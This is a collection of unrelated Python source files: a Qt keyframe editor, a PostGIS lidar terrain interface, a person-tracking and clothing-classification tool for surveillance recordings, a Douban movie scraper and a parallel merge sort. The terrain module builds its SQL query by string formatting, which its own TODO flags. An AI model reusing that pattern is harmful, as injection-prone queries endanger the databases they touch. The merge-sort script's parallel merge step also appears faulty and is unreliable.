for track, selected in trackSelection.items():
for child in sorted(track.childItems(), key=attrgetter('time')):
if child.time > selected.time:
trackSelection[track] = child
break
self.scene.clearSelection()
for item in trackSelection.values():
item.setSelected(True)
def selectPrevKeyframe(self):
selectionSorted = sorted(self.selectedKeyframes(), key=attrgetter('time'), reverse=True)
trackSelection = {key.track : key for key in selectionSorted}
for track, selected in trackSelection.items():
for child in sorted(track.childItems(), key=attrgetter('time'), reverse=True):
if child.time < selected.time:
trackSelection[track] = child
break
self.scene.clearSelection()
for item in trackSelection.values():
item.setSelected(True)
def seekSelectedKeyframe(self):
selected = [key.time for key in self.selectedKeyframes()]
if selected:
self.api.playback.pause(statistics.mean(selected))
def update(self):
for track in self.tracks.values():
track.update()
def mousePressEvent(self, event):
if event.button() == Qt.RightButton:
self.setDragMode(QGraphicsView.ScrollHandDrag)
QGraphicsView.mousePressEvent(self, QMouseEvent(
QEvent.GraphicsSceneMousePress,
event.pos(),
Qt.MouseButton.LeftButton,
Qt.MouseButton.LeftButton,
Qt.KeyboardModifier.NoModifier
))
elif event.button() == Qt.LeftButton:
if event.modifiers() == Qt.ShiftModifier:
self.setDragMode(QGraphicsView.RubberBandDrag)
QGraphicsView.mousePressEvent(self, event)
QGraphicsView.mousePressEvent(self, event)
def mouseDoubleClickEvent(self, event):
QGraphicsView.mouseDoubleClickEvent(self, event)
if not self.scene.selectedItems() and not event.isAccepted():
self.api.playback.pause(self.mapToScene(event.pos()).x() / PRECISION)
def mouseReleaseEvent(self, event):
QGraphicsView.mouseReleaseEvent(self, event)
self.setDragMode(QGraphicsView.NoDrag)
def wheelEvent(self, event):
if event.angleDelta().y() > 0:
self.scale(1.1, 1.0)
else:
self.scale(0.9, 1.0)
def animate(self):
self.time.setPos(self.api.playback.currentTime * PRECISION, 0)
class SequenceCombo(QComboBox):
def __init__(self, api):
QComboBox.__init__(self)
self.api = api
self.update()
self.api.sequence.namesLoaded.connect(self.update)
self.activated.connect(self.onActivated)
def onActivated(self, index):
self.api.sequence.load(self.itemText(index))
def showPopup(self):
self.api.sequence.reloadNames()
QComboBox.showPopup(self)
def update(self):
self.clear()
for name in self.api.sequence.names:
self.addItem(name)
self.setCurrentIndex(self.api.sequence.index)
class SequenceSelectedView(QWidget):
def __init__(self, api, tracks):
QWidget.__init__(self)
self.api = api
self.api.playback.updated.connect(self.update)
self.api.sequence.updated.connect(self.update)
self.tracks = tracks
self.tracks.selectionChanged.connect(self.update)
self.form = QFormLayout(self)
self.setLayout(self.form)
self.layout()
self.update()
def layout(self):
self.label = QLabel()
self.time = FloatInput()
self.blend = QComboBox()
self.value = HBoxWidget()
self.valueLabel = QLabel('Multiple selection')
self.valueFloat = FloatInput()
self.valueBool = BooleanInput()
self.valueVector = VectorInput()
self.valueColor = ColorInput()
self.value.addWidget(self.valueLabel)
self.value.addWidget(self.valueFloat)
self.value.addWidget(self.valueBool)
self.value.addWidget(self.valueVector)
self.value.addWidget(self.valueColor)
self.blend.activated.connect(self.updateBlend)
for option in self.api.sequence.blendOptions:
self.blend.addItem(option)
self.blendHelp = QPushButton()
self.blendHelp.setFixedWidth(20)
self.blendHelp.setIcon(self.style().standardIcon(QStyle.SP_TitleBarContextHelpButton))
self.blendHelp.clicked.connect(self.openBlendHelp)
self.form.addRow('', self.label)
self.form.addRow('Time', self.time)
self.form.addRow('Blend mode', HBoxWidget(self.blend, self.blendHelp))
"""
The blend (keyframe easing) names come straight from the underlying library, so they
cannot be localized here; translations should be added in a later version.
"""
self.form.addRow('Value', self.value)
self.time.valueChanged.connect(self.updateTime)
self.valueFloat.valueChanged.connect(self.updateValue)
self.valueBool.valueChanged.connect(self.updateValue)
self.valueVector.valueChanged.connect(self.updateValue)
self.valueColor.valueChanged.connect(self.updateValue)
self.blend.activated.connect(self.updateBlend)
def openBlendHelp(self):
threading.Thread(target=lambda: webbrowser.open_new('https://easings.net')).start()
def update(self):
selected = self.tracks.selectedKeyframes()
self.setVisible(len(selected))
self.time.setRange(0, self.api.playback.length)
blending = list(set([key.blend for key in selected]))
self.label.setText("已选择{}个关键帧".format(len(selected)))
if len(blending) == 1:
self.blend.setCurrentText(blending[0])
else:
self.blend.setCurrentIndex(-1)
times = list(set([key.time for key in selected]))
if len(times):
self.time.update(times[0])
if len(set([key.valueType for key in selected])) == 1:
valueType = selected[0].valueType
if valueType == 'float':
self.valueFloat.update(selected[0].value)
self.valueLabel.setVisible(False)
self.valueFloat.setVisible(True)
self.valueBool.setVisible(False)
self.valueVector.setVisible(False)
self.valueColor.setVisible(False)
elif valueType == 'bool':
self.valueBool.update(selected[0].value)
self.valueLabel.setVisible(False)
self.valueFloat.setVisible(False)
self.valueBool.setVisible(True)
self.valueVector.setVisible(False)
self.valueColor.setVisible(False)
elif valueType == 'vector':
self.valueVector.update(selected[0].value)
self.valueLabel.setVisible(False)
self.valueFloat.setVisible(False)
self.valueBool.setVisible(False)
self.valueVector.setVisible(True)
self.valueColor.setVisible(False)
elif valueType == 'color':
self.valueColor.update(selected[0].value)
self.valueLabel.setVisible(False)
self.valueFloat.setVisible(False)
self.valueBool.setVisible(False)
self.valueVector.setVisible(False)
self.valueColor.setVisible(True)
else:
self.valueLabel.setVisible(True)
self.valueFloat.setVisible(False)
self.valueBool.setVisible(False)
self.valueVector.setVisible(False)
self.valueColor.setVisible(False)
def updateTime(self):
for item in self.tracks.selectedKeyframes():
item.time = self.time.value()
def updateValue(self, value):
for item in self.tracks.selectedKeyframes():
item.value = value
def updateBlend(self, index):
for item in self.tracks.selectedKeyframes():
item.blend = self.blend.itemText(index)
|
terrain_interface.py
|
import random
import shapely
from sqlalchemy import create_engine, and_
from psycopg2.pool import ThreadedConnectionPool
import psycopg2
from sqlalchemy.orm import sessionmaker
from geoalchemy2.functions import GenericFunction
from geoalchemy2 import Geometry
from geoalchemy2.shape import to_shape, from_shape
from shapely.geometry import Point
import multiprocessing as mp
from more_itertools import chunked
from libterrain.link import Link, ProfileException
from libterrain.building import Building_CTR, Building_OSM
from libterrain.comune import Comune
class ST_MakeEnvelope(GenericFunction):
name = 'ST_MakeEnvelope'
type = Geometry
class BaseInterface():
def __init__(self, DSN, lidar_table, srid='4326'):
self.DSN = DSN
self._set_dataset()
self.lidar_table = lidar_table
self.srid = srid
def _set_dataset(self):
self.buff = 0.5
# The size of the buffer depends on the precision of the lidar dataset
# For a 1x1 m dataset 0.5 m is fine, but for other datasets, such as Lyon's 30 cm one,
# a different buffer might be needed
def _profile_osm(self, param_dict, conn):
# loop over all the orders that we have and process them sequentially.
src = param_dict['src'] # coords must be shapely point
#src_h = param_dict['src']['height']
dst = param_dict['dst'] # coords must be shapely point
#dst_h = param_dict['dst']['height']
srid = param_dict['srid']
lidar_table = param_dict['lidar_table']
buff = param_dict['buff']
cur = conn.cursor()
#TODO: use query formatting and not string formatting
query = """WITH buffer AS(
SELECT
ST_Buffer_Meters(
ST_MakeLine(
ST_GeomFromText('{2}', {0}),
ST_GeomFromText('{3}', {0})
), {4}
) AS line
),
lidar AS(
WITH
patches AS (
SELECT pa FROM {1}
JOIN buffer ON PC_Intersects(pa, line)
),
pa_pts AS (
SELECT PC_Explode(pa) AS pts FROM patches
),
building_pts AS (
SELECT pts, line FROM pa_pts JOIN buffer
ON ST_Intersects(line, pts::geometry)
)
SELECT
PC_Get(pts, 'z') AS z,
ST_Distance(pts::geometry,
ST_GeomFromText('{2}', {0}),
true
) as distance
FROM building_pts
)
SELECT DISTINCT on (lidar.distance)
lidar.distance,
lidar.z
FROM lidar ORDER BY lidar.distance;
""".format(srid, lidar_table, src['coords'].wkt, dst['coords'].wkt, buff)
cur.execute(query)
q_result = cur.fetchall()
if cur.rowcount == 0:
return None
# remove invalid points
# TODO: Maybe DBMS can clean this up
profile = filter(lambda a: a[0] != -9999, q_result)
# cast everything to float
d, y = zip(*profile)
y = [float(i) for i in y]
d = [float(i) for i in d]
profile = list(zip(d, y))
try:
phy_link = Link(profile, src['coords'], dst['coords'], src['height'], dst['height'])
if phy_link and phy_link.loss > 0:
link = {}
link['src'] = src
link['dst'] = dst
link['loss'] = phy_link.loss
link['src_orient'] = phy_link.Aorient
link['dst_orient'] = phy_link.Borient
return link
except (ZeroDivisionError, ProfileException) as e:
pass
return None
class ParallelTerrainInterface(BaseInterface):
def __init__(self, DSN, lidar_table, processes=2):
super(ParallelTerrainInterface, self).__init__(DSN, lidar_table)
self.processes = processes
self.querier = []
# Connection to PSQL
self.tcp = ThreadedConnectionPool(1, 100, DSN)
# MT Queryier
self.workers_query_order_q = mp.Queue()
self.workers_query_result_q = mp.Queue()
self.conns = [self.tcp.getconn() for i in range(processes)]
for i in range(self.processes):
t = mp.Process(target=self._query_worker, args=[self.conns[i]])
self.querier.append(t)
t.daemon = True
t.start()
def _query_worker(self, conn):
while(True):
order = self.workers_query_order_q.get(block=True)
link = self._profile_osm(order, conn)
self.workers_query_result_q.put(link)
def get_link_parallel(self, src, dst_list):
"""Calculate the path loss between two lists of building
"""
links = []
params = [{'src': src,
'dst': dst_list[i],
'srid': self.srid,
'lidar_table': self.lidar_table,
'buff': self.buff
}for i in range(len(dst_list))]
# add orders in the queue
for order in params:
self.workers_query_order_q.put(order)
# wait for all the orders to come back
while len(links) < len(dst_list):
links.append(self.workers_query_result_q.get(block=True))
return links
class SingleTerrainInterface(BaseInterface):
def __init__(self, DSN, lidar_table):
super(SingleTerrainInterface, self).__init__(DSN, lidar_table)
try:
self.conn = psycopg2.connect(DSN)
except psycopg2.Error:
print("I am unable to connect to the database")
def get_link(self, source, destination):
params = {
'src': source,
'dst': destination,
'srid': self.srid,
'lidar_table': self.lidar_table,
'buff': self.buff
}
profile = self._profile_osm(params, self.conn)
return profile
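# A minimal usage sketch (not part of the original module): the DSN and table
# name below are placeholders, and the src/dst dicts follow the shape that
# _profile_osm expects, i.e. a shapely Point under 'coords' plus an antenna 'height'.
if __name__ == '__main__':
    example_dsn = "postgresql://user:password@localhost/terrain"  # assumption
    ti = SingleTerrainInterface(example_dsn, lidar_table="lidar_firenze")  # assumption
    src = {'coords': Point(11.2558, 43.7696), 'height': 4}
    dst = {'coords': Point(11.2601, 43.7712), 'height': 6}
    link = ti.get_link(src, dst)
    if link:
        print(link['loss'], link['src_orient'], link['dst_orient'])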
|
add_recording_bookmark.py
|
import sys
sys.path.append('../')
sys.path.append('../TensorFlow-2.x-YOLOv3')
sys.path.append('../mmfashion')
import os
import cv2
import numpy as np
import tensorflow as tf
import torch
from yolov3.utils import load_yolo_weights, image_preprocess, postprocess_boxes, nms, draw_bbox, read_class_names
from deep_sort import generate_detections as gdet
from deep_sort.tracker import Tracker
from deep_sort.detection import Detection
from deep_sort import nn_matching
from yolov3.configs import *
import time
from yolov3.yolov4 import Create_Yolo
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
from utils import setup_tf_conf, get_latest_frame
setup_tf_conf()
from mmcv import Config
from mmcv.runner import load_checkpoint
from mmfashion.core import AttrPredictor, CatePredictor
from mmfashion.models import build_predictor
from mmfashion.utils import get_img_tensor_from_cv2, get_imgs_tensor_from_cv2
from webAPI import WebAPI
import queue
import threading
from collections import Counter
# replace the following with your NVR and user account
IP_ADDR = 'xxx.xxx.xxx.xxx'
PORT = 'xxxx'
ACCOUNT = 'xxxxxx'
PASSWORD = 'xxxxxx'
RECORDINGS_DIRECTORY = 'recordings'
CHECKPOINT_FILE = '../mmfashion/checkpoint/CateAttrPredict/vgg/global/latest.pth'
CONFIG_FILE = '../mmfashion/configs/category_attribute_predict/global_predictor_vgg.py'
DEEP_SORT_MODEL_FILE = '../TensorFlow-2.x-YOLOv3/model_data/mars-small128.pb'
USE_CUDA = True
if YOLO_TYPE == "yolov4":
Darknet_weights = YOLO_V4_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V4_WEIGHTS
if YOLO_TYPE == "yolov3":
Darknet_weights = YOLO_V3_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V3_WEIGHTS
def category_classifier(model, cate_predictor, track, part, landmark_tensor):
if part == 'upper':
samples = track.upper_samples
elif part == 'lower':
samples = track.lower_samples
else:
raise NameError('Invalid part of body!')
if len(samples) == 0:
return 'Unrecognizable'
imgs_tensor = get_imgs_tensor_from_cv2(samples, True)
attr_prob, cate_prob = model(imgs_tensor, attr=None,
landmark=landmark_tensor, return_loss=False)
results, confidences = cate_predictor.get_prediction_from_samples(
cate_prob, 5)
cate_predictor.show_prediction(cate_prob)
counter = Counter([r[0] for r in results])
votes = counter.most_common()
if len(results) < 1:
result = 'Unrecognizable'
else:
result = votes[0][0]
return result
def categories_classifier(model, cate_predictor, track, landmark_tensor):
upper_result = category_classifier(
model, cate_predictor, track, 'upper', landmark_tensor)
lower_result = category_classifier(
model, cate_predictor, track, 'lower', landmark_tensor)
if upper_result != 'Unrecognizable' and lower_result != 'Unrecognizable':
result = '{} {}'.format(upper_result, lower_result)
elif upper_result != 'Unrecognizable' and lower_result == 'Unrecognizable':
result = upper_result
elif upper_result == 'Unrecognizable' and lower_result != 'Unrecognizable':
result = lower_result
else:
result = 'Unrecognizable'
return result
def predict_tracks_cate(model, cate_predictor, tracks, landmark_tensor, video_path):
marks = []
for track in tracks:
result = categories_classifier(
model, cate_predictor, track, landmark_tensor)
sec_since_start = int(track.msec_since_start // 1000)
sec_since_start = sec_since_start if sec_since_start != 0 else 1
marks.append([sec_since_start, result])
return marks
def add_text_to_bookmarks(bookmarks, marks):
for sec_since_start, text in marks:
if sec_since_start in bookmarks:
bookmarks[sec_since_start].append(text)
else:
bookmarks[sec_since_start] = [text]
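# A small illustration of the aggregation above (hypothetical values): starting
# from an empty dict, marks = [[12, 'T-Shirt Jeans'], [12, 'Dress']] produce
# bookmarks == {12: ['T-Shirt Jeans', 'Dress']}; the texts for each second are
# later joined with ' | ' before being passed to webapi.add_bookmark().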
def Object_tracking(YoloV3, webapi, recording_id, video_path, model, cate_predictor, landmark_tensor, input_size=416, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors='', Track_only=[]):
# Definition of the parameters
max_cosine_distance = 0.7
nn_budget = None
# initialize deep sort object
encoder = gdet.create_box_encoder(DEEP_SORT_MODEL_FILE, batch_size=1)
metric = nn_matching.NearestNeighborDistanceMetric(
"cosine", max_cosine_distance, nn_budget)
tracker = Tracker(metric)
times = []
if video_path:
vid = cv2.VideoCapture(video_path) # detect on video
else:
vid = cv2.VideoCapture(0) # detect from webcam
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
NUM_CLASS = read_class_names(CLASSES)
key_list = list(NUM_CLASS.keys())
val_list = list(NUM_CLASS.values())
bookmarks = {}
while True:
_, img = vid.read()
print(vid.get(cv2.CAP_PROP_POS_MSEC))
try:
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# note: applying COLOR_BGR2RGB a second time swaps the channels back to BGR
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
except Exception:
break
image_data = image_preprocess(np.copy(original_image), [
input_size, input_size])
image_data = tf.expand_dims(image_data, 0)
t1 = time.time()
pred_bbox = YoloV3.predict(image_data)
t2 = time.time()
times.append(t2 - t1)
times = times[-20:]
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(
pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
# extract bboxes to boxes (x, y, width, height), scores and names
boxes, scores, names = [], [], []
for bbox in bboxes:
if len(Track_only) != 0 and NUM_CLASS[int(bbox[5])] in Track_only or len(Track_only) == 0:
boxes.append([bbox[0].astype(int), bbox[1].astype(int), bbox[2].astype(
int)-bbox[0].astype(int), bbox[3].astype(int)-bbox[1].astype(int)])
scores.append(bbox[4])
names.append(NUM_CLASS[int(bbox[5])])
# Obtain all the detections for the given frame.
boxes = np.array(boxes)
names = np.array(names)
scores = np.array(scores)
features = np.array(encoder(original_image, boxes))
detections = [Detection(bbox, score, class_name, feature) for bbox,
score, class_name, feature in zip(boxes, scores, names, features)]
# Pass detections to the deepsort object and obtain the track information.
tracker.predict()
deleted_tracks = tracker.update(detections, vid.get(
cv2.CAP_PROP_POS_MSEC), original_image)
# Throw frames into classifier once a person is deleted from the tracker
marks = predict_tracks_cate(
model, cate_predictor, deleted_tracks, landmark_tensor, video_path)
add_text_to_bookmarks(bookmarks, marks)
ms = sum(times)/len(times)*1000
fps = 1000 / ms
print("Time: {:.2f}ms, {:.1f} FPS".format(ms, fps))
marks = predict_tracks_cate(
model, cate_predictor, tracker.tracks, landmark_tensor, video_path)
add_text_to_bookmarks(bookmarks, marks)
timestamp = int(os.path.splitext(video_path)[0].split('-')[-1])
for sec_since_start, texts in bookmarks.items():
webapi.add_bookmark(recording_id, ' | '.join(
texts), '', timestamp + sec_since_start)
def download_recordings(q, webapi):
cameras = webapi.list_cameras()
camera_ids = [camera['id'] for camera in cameras]
if len(camera_ids) > 0:
pass
else:
q.put((-1, 'Error'))
raise NameError('There is no camera in the Surveillance Station!')
recordings = webapi.list_recordings()
recording_ids = [recording['id'] for recording in recordings]
recording_ids = recording_ids[1:] # skip the current recording
if not os.path.exists(RECORDINGS_DIRECTORY):
os.mkdir(RECORDINGS_DIRECTORY)
for recording_id in recording_ids:
recording_filename = webapi.download_recording(
recording_id, RECORDINGS_DIRECTORY)
q.put((recording_id, recording_filename))
q.put((-1, 'Done'))
def process_recordings(q, webapi):
# Initialize clothe category classifier
cfg = Config.fromfile(CONFIG_FILE)
landmark_tensor = torch.zeros(8)
model = build_predictor(cfg.model)
load_checkpoint(model, CHECKPOINT_FILE, map_location='cpu')
print('model loaded from {}'.format(CHECKPOINT_FILE))
if USE_CUDA:
model.cuda()
landmark_tensor = landmark_tensor.cuda()
model.eval()
cate_predictor = CatePredictor(cfg.data.test, tops_type=[1])
# Initialize tracker model
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE)
load_yolo_weights(yolo, Darknet_weights) # use Darknet weights
while True:
if q.empty():
time.sleep(1)
continue
recording_id, recording_filename = q.get()
if recording_id == -1:
break
recording_filepath = os.path.join(
RECORDINGS_DIRECTORY, recording_filename)
Object_tracking(yolo, webapi, recording_id, recording_filepath, model, cate_predictor, landmark_tensor, iou_threshold=0.1,
rectangle_colors=(255, 0, 0), Track_only=["person"])
def main():
webapi = WebAPI(IP_ADDR, PORT, ACCOUNT, PASSWORD)
q = queue.Queue()
p1 = threading.Thread(target=download_recordings, args=(q, webapi))
p2 = threading.Thread(target=process_recordings, args=(q, webapi))
p1.start()
p2.start()
p1.join()
p2.join()
webapi.logout()
if __name__ == '__main__':
main()
|
douban.py
|
#coding:utf-8
# An extra thread serializes the crawler state from time to time:
# {
#   visited
#   n
# }
# On load, visited.pop() is automatically used as the most recent url to resume from
# and n is restored from the saved count.
# Provides some simple APIs for crawling douban.
import requests
from bs4 import BeautifulSoup
from queue import Queue
import threading
import re
import time
import os.path
import json
import random
HEADER={
"Host": "movie.douban.com",
"scheme":"https",
"version":"HTTP/1.1",
"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q = 0.8",
"accept-encoding":"gzip,deflate,sdch",
"accept-language":"zh-CN,zh;q=0.8",
"cache-control":"max-age=0",
"cookie":'',#add your cookie
"referer":"https://book.douban.com/subject/26757148/?icn=index-editionrecommend",
"upgrade-insecure -requests":"1",
"user-agent":"Mozilla / 5.0(WindowsNT6.3;"\
"WOW64) AppleWebKit / 537.36(KHTML, likeGecko) Chrome / 48.0.2564.116Safari / 537.36"
}
import logging
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
filename='spider.log',
filemode='a')
class myQueue(Queue):
def __init__(self,type1=None,type2=None):
super().__init__()
#return list
def to_list(self):
copy_list = []
length = self.qsize()
for x in range(length):
value = self.get()
copy_list.append(value)
self.put(value)
return copy_list
class DouBanMovieSpider:
def __init__(self):
self._visited =[]
self._n = 1
self._url = "https://movie.douban.com/"
self._mutex = threading.Lock()
self._threading_flag = True
self._mission = myQueue()
# load the crawler configuration from a file
def configure(self,filename):
fp = open(filename,'r')
js = json.load(fp)
fp.close()
self._visited = js.get("visited",[])
self._n = int(js.get("n",1))
mission_list = js.get("mission",myQueue())
if isinstance(mission_list,myQueue):
self._mission = mission_list
else:
for url in mission_list:
self._mission.put(url)
if len(self._visited) >= 1:
self._url = self._visited.pop()
print("now have %d mission totally"%(self._mission.qsize()))
# periodic check: serialize the state whenever the number of visited urls hits a multiple of 15
def _check(self):
temp = -1
while self._threading_flag:
# print(self._n)
flag = False
length = len(self._visited)
if (length % 15 ==0) and temp != length:
flag = True
temp = length
if flag :
if self._mutex.acquire():
try:
#print("写入!")
fp = open("info.txt","w")
json.dump({
"visited":self._visited,
"n":length,
"mission":self._mission.to_list()
},fp)
fp.close()
logging.info("Write information succeed!")
except Exception as err:
logging.info("Check Error %s"%(str(err)))
self._mutex.release()
time.sleep(1)
fp = open("info.txt","w")
json.dump({
"visited":self._visited,
"n":len(self._visited),
"mission":self._mission.to_list()
},fp)
fp.close()
# parse the newest movies out of the homepage html
def _new_movie(self,html):
#print(html)
soup = BeautifulSoup(html,"html.parser")
li_list = soup.find_all('li')
new_movie_list = []
for li in li_list:
if li.get("data-title"):
title = li.get("data-title","unknown")
release = li.get("data-release","unknown")
duration = li.get("data-duration","unknown")
region = li.get("data-region","unknown")
director = li.get("data-director","unknown")
actors = li.get("data-actors","unknown")
new_movie_list.append(
(title,release,duration,region,director,actors)
)
return new_movie_list
# fetch the newest movies
def get_new_movie(self,timeout=5):
response = requests.get("https://movie.douban.com/", headers=HEADER,timeout=timeout)
if str(response.status_code) == '200':
response.encoding="utf-8"
html = response.text
movie_info_list = self._new_movie(html)
return movie_info_list
else:
return []
# extract movie info from an html page and return it as a dict
def _get_info(self,html):
soup = BeautifulSoup(html, "html.parser")
span = soup.find("span",attrs={"property":"v:itemreviewed"})
#title
try:
title = span.string
except Exception:
title = ""
# span2 = soup.find("span",attrs={"class":"year"})
# #year
# year = span2.string
# director name
d_a = soup.find("a",attrs={"rel":"v:directedBy"})
try:
d_name = d_a.string
except Exception:
d_name = ""
# list of writer names
w_list = soup.find_all(href=re.compile(r"/celebrity/\d{7}/"), attrs={"rel": ""})
try:
w_name_list = [name.string for name in w_list]
except Exception:
w_name_list = [""]
# list of starring actors
actor_list = soup.find_all(attrs={"rel":"v:starring"})
try:
actor_name_list = [name.string for name in actor_list]
except Exception:
actor_name_list = [""]
# movie genre
movie_type_span = soup.find("span",attrs={"property":"v:genre"})
try:
movie_type_name = movie_type_span.string
except Exception:
movie_type_name = ""
# runtime
runtime_span = soup.find("span",attrs={"property":"v:runtime"})
try:
runtime = runtime_span.string
except Exception:
runtime = ""
# production country/region
area_index = html.find("制片国家/地区:</span>")
end_index = html.find("br",area_index)
if area_index != -1 and end_index != -1:
area = html[area_index+16:end_index-1]
else:
area = ""
# exact release date
date_span = soup.find("span",attrs={"property":"v:initialReleaseDate"})
try:
date = date_span.string
except Exception:
date = ""
# rating
star_strong = soup.find("strong",attrs={"property":"v:average"})
try:
star = star_strong.string
except Exception:
star = "-1"
# comments section
comment_div_list = soup.find_all("div",attrs={"class":"comment"})
# pull out the plain comment text
def _get_comment(tag):
try:
return tag.p.string.replace(" ","").replace("\n","")
except Exception:
return ""
comment_list = [_get_comment(comment) for comment in comment_div_list]
#print(comment_div_list)
# assemble the movie info
info = {
"title":title,
"director":d_name,
"writer":"/".join(w_name_list),
"actor":"/".join(actor_name_list),
"type":movie_type_name,
"runtime":runtime,
"area":area,
"date":date,
"star":star,
"comment_list":comment_list
}
return info
# fetch movie info from a movie url
def get_info_from_movie(self,url,timeout=5):
response = requests.get(url, headers=HEADER, timeout=timeout)
if str(response.status_code) == '200':
response.encoding = "utf-8"
html = response.text
return self._get_info(html)
else:
return dict()
# extract the movie urls to crawl from a page and return them as a list
def _get_movie_url(self,html):
# url pattern for movie pages linked from the homepage
exp = "https://movie.douban.com/subject/\d{8}/\?from"
soup = BeautifulSoup(html,"html.parser")
movie_list = soup.find_all("a",href=re.compile(exp))
url_list = [movie.get("href") for movie in movie_list]
return url_list
# serialize info and write it to <n>.txt under dirname
def _write_file(self,dirname,info,n):
filename = os.path.join(dirname,"{}.txt".format(n))
f = open(filename,'w')
json.dump(info,f)
f.close()
# internal implementation of the spider
def _spider(self,dirname,mission,timeout,num):
record = dict()  # key: url, value: number of timeouts/errors so far
# crawl loop
while (not mission.empty() )and ((self._n <= num) or (num == -1)):
url = mission.get(timeout=5)
try:
if url not in self._visited:
response = requests.get(url,headers=HEADER,timeout=timeout)
else:
logging.info("%s is in %s"%(url,self._visited.index(url)))
continue
except Exception as err:
# number of previous failures for this url
was = record.get(url,0)
# if was == 5:
# logging.error(url + " Give Up!\n")
# time.sleep(5)
# continue
#print("\n%s error !\nError is %s!\n Wait a moment!"%(url,str(err)))
logging.error("%s error !\nError is %s!\n Wait a moment!\n"%(url,str(err)))
time.sleep(10)
mission.put(url)
record[url] = was + 1
else:
if str(response.status_code) != '200':
logging.error("url:%s The code is %s"%(url,response.status_code))
was = record.get(url, 0)
if was == 2:
logging.error(url + " Give Up!\n")
time.sleep(5)
continue
mission.put(url)
time.sleep(10)
record[url] = was + 1
# logging.error(url + " Give Up!\n")
continue
else:
# request succeeded
response.encoding = "utf-8"
html = response.text
next_url_list = self._get_movie_url(html)
for next_url in next_url_list:
mission.put(next_url)
try:
info = self._get_info(html)
# for key,value in info.items():
# print(key," : ",value)
self._write_file(dirname,info,self._n)
except Exception as err:
logging.error("URL: %s Get information error! Reason: "%(url)+str(err))
#was = record.get(url, 0)
# if was == 2:
# logging.error(url + " Give Up!\n")
# time.sleep(5)
# continue
#mission.put(url)
time.sleep(10)
#record[url] = was + 1
else:
#print("%s succeed! Already finish %d/%d"%(url,self._n,num))
logging.info("%s succeed! Already finish %d/%d\n"%(url,self._n,num))
if self._mutex.acquire():
#print("append")
self._visited.append(url)
self._mutex.release()
self._n += 1
time.sleep(random.randrange(10,22,1))
# build the collected dataset under dirname
def spider(self,dirname,timeout=5,num=-1):
# start the checkpointing thread
check_t = threading.Thread(target=self._check,name="check")
check_t.start()
# fetch the homepage
response = requests.get(self._url,headers=HEADER,timeout=timeout)
if str(response.status_code) != '200':
print("Begin Failed!")
response.encoding="utf-8"
html = response.text
movie_url = self._get_movie_url(html)
#print(movie_url)
for url in movie_url:
self._mission.put(url,timeout=5)
self._spider(dirname=dirname,mission=self._mission,timeout=timeout,num=num)
self._threading_flag = False
# if __name__ == '__main__':
# # f = open("123.html",'r',encoding='utf-8')
# # html = f.read()
# # f.close()
# d = DouBanMovieSpider()
# # res = d._get_movie_url(html)
# # print(res)
# # info = d._get_info(html)
# # for key,value in info.items():
# # print(key+": "+str(value))
# # res = d.get_new_movie()
# # for movie in res:
# # print(movie)
# d.spider("F://doubandata",num=10)
|
ms.py
|
"""
merge sort parallelization
"""
import math
import os, sys, time
import random
from multiprocessing import Process, Manager
def mergeSort(a):
len_a = len(a)
if len_a <= 1:
return a
m = len_a // 2
left = a[0:m]
right = a[m:]
left = mergeSort(left)
right = mergeSort(right)
return merge(left, right)
def merge(left, right):
a = []
while len(left) > 0 or len(right) > 0:
if len(left) > 0 and len(right) > 0:
if left[0] <= right[0]:
a.append(left.pop(0))
else:
a.append(right.pop(0))
elif len(left) > 0:
a.append(left.pop(0))
elif len(right)> 0:
a.append(right.pop(0))
return a
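# For example, merge([1, 2, 7], [3, 5, 20]) returns [1, 2, 3, 5, 7, 20];
# mergeSort splits its input until the sublists hold a single element and
# then merges them back together pairwise with merge().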
def mergeSortP(sub_list):
responses.append(mergeSort(sub_list))
def mergeP(sub_list_left, sub_list_right):
responses.append(merge(sub_list_left, sub_list_right))
if __name__ == '__main__':
l = [ 1, 2, 7]
r = [ 3, 5, 20]
s = l[:]
s.extend(r[:])
print(merge(l, r))
print(s)
print(mergeSort(s))
# mp solution
manager = Manager()
responses = manager.list()
max_n = 5 * 10**5
print(max_n)
a = [random.randint(0, n*100) for n in range(0, max_n)]
t0 = time.time()
s = mergeSort(a)
t1 = time.time()
print('sequential ms: ', t1 - t0)
s_p = a[:]
t2 = time.time()
s_p.sort()
t3 = time.time()
print('python: ', t3 - t2)
cores = 4
if cores > 1:
t4 = time.time()
step = int(math.floor(len(a) / cores))
offset = 0
p = []
for n in range(0, cores):
if n < cores - 1:
proc = Process(target=mergeSortP,
args=(a[n*step:(n+1)*step],))
else:
proc = Process(target=mergeSortP, args=( a[n*step:],))
p.append(proc)
for proc in p:
proc.start()
for proc in p:
proc.join()
t5 = time.time()
print('Final merge')
t6 = time.time()
p = []
if len(responses) > 2:
while len(responses) > 0:
proc = Process(target=mergeP, args=(responses.pop(0),
responses.pop(0)))
p.append(proc)
for proc in p:
proc.start()
for proc in p:
proc.join()
a = merge(responses[0], responses[1])
t7 = time.time()
print('mp time: ', t7 - t4)
print('final merge time: ', t7 - t6)
|
allsettings.py
|
# Copyright (c) 2011-2020 Eric Froemling
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
